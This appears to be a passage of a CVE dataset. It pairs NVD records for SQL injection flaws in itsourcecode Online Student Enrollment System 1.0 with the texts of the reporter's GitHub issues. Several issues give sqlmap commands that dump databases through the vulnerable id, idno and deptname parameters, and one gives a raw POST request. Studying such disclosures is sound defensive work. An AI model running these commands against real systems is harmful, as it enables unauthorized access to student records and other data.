"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/5"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266306"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266306"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344606"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266306"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266306"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344606"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Lanxiy7th/lx_CVE_report-/issues/5 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Lanxiy7th",
"lx_CVE_report-"
] | # Itsourcecode Online Student Enrollment System Project In PHP editSubject.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online Student Enrollment System Project In PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Lanxiy7th
## Vulnerable File
+ editSubject.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'editSubject.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "id" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="721" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/38e3a8ab-a504-434c-a603-e678626fcb1a">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "editSubject.php" file. This vulnerability stems from insufficient user input validation of the "id" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
## Vulnerability type:
+ boolean-based blind
+ time-based blind
+UNION query
## Vulnerability location:
+ 'id' parameter
## Payload:
<img width="313" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/11a8f3d6-27ac-43dd-861d-3c91b0328657">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u "http://192.168.144.199:1217/kccreg/editSubject.php?id=11" --batch --level 5 --dbs
```
<img width="314" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/c132dda1-0e34-4e68-ae48-a696d28569a7">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Online Student Enrollment System Project In PHP editSubject.php SQL injection | https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/5/comments | 0 | 2024-05-26T03:42:45Z | 2024-05-26T03:42:45Z | https://github.com/Lanxiy7th/lx_CVE_report-/issues/5 | 2,317,418,785 | 5 | 6,036 |
CVE-2024-5393 | 2024-05-27T02:15:09.240 | A vulnerability was found in itsourcecode Online Student Enrollment System 1.0. It has been classified as critical. This affects an unknown part of the file listofcourse.php. The manipulation of the argument idno leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-266307. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/6"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266307"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266307"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344608"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/6"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266307"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266307"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344608"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Lanxiy7th/lx_CVE_report-/issues/6 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Lanxiy7th",
"lx_CVE_report-"
] | # Itsourcecode Online Student Enrollment System Project In PHP listofcourse.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online Student Enrollment System Project In PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Lanxiy7th
## Vulnerable File
+ listofcourse.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'listofcourse.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "idno" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="758" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/b09daf68-eae9-48ed-b1d5-be2893e2133d">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "listofcourse.php" file. This vulnerability stems from insufficient user input validation of the "idno" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
## Vulnerability type:
+ boolean-based blind
+ time-based blind
## Vulnerability location:
+ 'idno' parameter
## Payload:
<img width="317" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/dda6a8ab-d0d2-4066-8b84-336b8f15b794">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -u "http://192.168.144.199:1217/kccreg/listofcourse.php?idno=123&Major=123" --batch --level 5 --dbs
```
<img width="314" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/f94a127f-c4fa-4b94-9262-5ffe3d0a985b">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Online Student Enrollment System Project In PHP listofcourse.php SQL injection | https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/6/comments | 0 | 2024-05-26T03:55:14Z | 2024-05-26T03:55:14Z | https://github.com/Lanxiy7th/lx_CVE_report-/issues/6 | 2,317,425,493 | 6 | 6,037 |
CVE-2024-5394 | 2024-05-27T02:15:09.530 | A vulnerability was found in itsourcecode Online Student Enrollment System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file newDept.php. The manipulation of the argument deptname leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-266308. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/7"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266308"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266308"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344612"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266308"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266308"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344612"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/Lanxiy7th/lx_CVE_report-/issues/7 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"Lanxiy7th",
"lx_CVE_report-"
] | # Itsourcecode Online Student Enrollment System Project In PHP newDept.php SQL injection
# NAME OF AFFECTED PRODUCT(S)
+ Online Student Enrollment System Project In PHP
## Vendor Homepage
+ https://itsourcecode.com/free-projects/php-project/online-student-enrollment-system/
# AFFECTED AND/OR FIXED VERSION(S)
## submitter
+ Lanxiy7th
## Vulnerable File
+ newDept.php
## VERSION(S)
+ V1.0
## Software Link
+ https://itsourcecode.com/wp-content/uploads/2016/01/kccreg.zip
# PROBLEM TYPE
## Vulnerability Type
+ SQL injection
## Root Cause
+ A SQL injection vulnerability was found in the 'newDept.php' file of the 'online-student-enrollment-system' project. The reason for this issue is that attackers inject malicious code from the parameter "deptname" and use it directly in SQL queries without the need for appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations.
<img width="512" alt="1" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/35160c39-3994-48ae-886b-559e0b2dd7ce">
## Impact
+ Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity.
# DESCRIPTION
+ During the security review of the 'Online Student Enrollment System Project In PHP', Lanxiy7th discovered a critical SQL injection vulnerability in the "newDept.php" file. This vulnerability stems from insufficient user input validation of the "deptname" parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity.
# Vulnerability details and POC
POST /kccreg/newDept.php HTTP/1.1
Host: 192.168.144.199:1217
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 39
Origin: http://192.168.144.199:1217
Connection: close
Referer: http://192.168.144.199:1217/kccreg/newDept.php
Cookie: pma_lang=zh_CN; phpMyAdmin=len9ob4npbvfdq6covmbegt63r; pmaUser-1=%7B%22iv%22%3A%22T%5C%2FCNohNoUS6vPeq7Nu7Zlw%3D%3D%22%2C%22mac%22%3A%22612b6061a48fea2497ec15d24ac758094d001624%22%2C%22payload%22%3A%22oBKb1qokv1s8RyKQorlz4w%3D%3D%22%7D; PHPSESSID=hnl0ppij1sd9vouvkhsg32c1j5; pmaAuth-1=%7B%22iv%22%3A%229HoKmgAu8K5%5C%2FvRe%5C%2FctcrUw%3D%3D%22%2C%22mac%22%3A%22d1b4c1f728f0b917499c499c26c1efc9e4cc99c7%22%2C%22payload%22%3A%22A4x7p0kon2pEBGwcRUcZJJM01WQ6mIgqc1HifbZxU2o%3D%22%7D
Upgrade-Insecure-Requests: 1
Priority: u=1
deptid=&deptname=123&deptdesc=123&save=
## Vulnerability type:
+ boolean-based blind
+ time-based blind
## Vulnerability location:
+ 'deptname' parameter
## Payload:
<img width="318" alt="2" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/f8c17c66-5844-48b3-a5a5-5549ce487d5f">
## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool:
```bash
sqlmap -r abc --batch --dbs
```
<img width="308" alt="3" src="https://github.com/Lanxiy7th/lx_CVE_report-/assets/151617791/2207dc2a-a337-40ad-b2b8-35e83d3b5108">
# Suggested repair
1. **Use prepared statements and parameter binding:**
Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code.
2. **Input validation and filtering:**
Strictly validate and filter user input data to ensure it conforms to the expected format.
3. **Minimize database user permissions:**
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations.
4. **Regular security audits:**
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities. | Itsourcecode Online Student Enrollment System Project In PHP newDept.php SQL injection | https://api.github.com/repos/Lanxiy7th/lx_CVE_report-/issues/7/comments | 0 | 2024-05-26T04:13:15Z | 2024-05-26T04:14:08Z | https://github.com/Lanxiy7th/lx_CVE_report-/issues/7 | 2,317,452,360 | 7 | 6,038 |
CVE-2024-5395 | 2024-05-27T03:15:08.370 | A vulnerability was found in itsourcecode Online Student Enrollment System 1.0. It has been rated as critical. This issue affects some unknown processing of the file listofinstructor.php. The manipulation of the argument FullName leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-266309 was assigned to this vulnerability. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "cna@vuldb.com",
"type": "Secondary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"source": "cna@vuldb.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": [
{
"cvssData": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"availabilityRequirement": "NOT_DEFINED",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityRequirement": "NOT_DEFINED",
"exploitMaturity": "NOT_DEFINED",
"integrityRequirement": "NOT_DEFINED",
"modifiedAttackComplexity": "NOT_DEFINED",
"modifiedAttackRequirements": "NOT_DEFINED",
"modifiedAttackVector": "NOT_DEFINED",
"modifiedPrivilegesRequired": "NOT_DEFINED",
"modifiedSubAvailabilityImpact": "NOT_DEFINED",
"modifiedSubConfidentialityImpact": "NOT_DEFINED",
"modifiedSubIntegrityImpact": "NOT_DEFINED",
"modifiedUserInteraction": "NOT_DEFINED",
"modifiedVulnAvailabilityImpact": "NOT_DEFINED",
"modifiedVulnConfidentialityImpact": "NOT_DEFINED",
"modifiedVulnIntegrityImpact": "NOT_DEFINED",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"source": "cna@vuldb.com",
"type": "Secondary"
}
]
} | [
{
"source": "cna@vuldb.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/8"
},
{
"source": "cna@vuldb.com",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266309"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266309"
},
{
"source": "cna@vuldb.com",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344622"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/Lanxiy7th/lx_CVE_report-/issues/8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Permissions Required",
"VDB Entry"
],
"url": "https://vuldb.com/?ctiid.266309"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?id.266309"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory",
"VDB Entry"
],
"url": "https://vuldb.com/?submit.344622"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:itsourcecode:online_student_enrollment_system:1.0:*:*:*:*:*:*:*",
"matchCriteriaId": "206B072E-A37F-4569-B5E1-B2305B37DB95",
"versionEndExcluding": null,
